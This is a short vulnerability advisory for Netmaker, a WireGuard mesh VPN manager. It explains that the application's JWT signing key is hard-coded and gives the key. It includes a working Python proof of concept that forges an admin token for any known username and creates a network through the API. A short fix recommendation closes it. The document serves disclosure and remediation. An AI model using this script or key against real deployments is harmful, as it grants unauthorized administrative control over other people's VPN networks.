Netmaker is an applicaton that enable easly deployment of a mesh vpn based on Wiregaurd.
To authenticate and manage users throughout the application, it is used JWT tokens.
The secret key used to sign these tokens is hard-coded in the code, which means they can be faked. So, an attacker can create a valid authentication token for any user and use it with admin privileges since the privilege verification is implemented on top of them.
To explore this vulnerability is necessary to know an existent username.
Instructions:
Change the username
and netmaker_api
variables for an existent username and the api url of your instance.
Run the exploit below.
from requests import post
import jwt # pip3 install pyjwt
username = 'cenas1' # CHANGEME valid username
netmaker_api = "https://api.nm.1-7-8-9.nip.io:443" # CHANGEME please change this for your api host
netmaker_url = netmaker_api + "/api/networks"
hardcoded_secretKey = '(BytesOverTheWire)'
encoded_jwt = jwt.encode({
"IsAdmin": True,
"UserName": username,
"Networks": [],
},hardcoded_secretKey, algorithm='HS256') # creates a "fake" JWT token
headers = {"Authorization": "Bearer " + encoded_jwt}
d_json={"addressrange": "10.134.2.0/24", "addressrange6": "", "defaultudpholepunch": "yes", "isdualstack": "no", "islocal": "no", "localrange": "", "netid": "illegalnet"}
r = post(netmaker_url, headers=headers, json=d_json)
Networks
tab, on the netmaker-ui and check if a new network was created, called illegalnet
.An attacker knowing the username of a valid user can perform any action as a user with admin privileges.
Generate a random JWT key in the instalation process.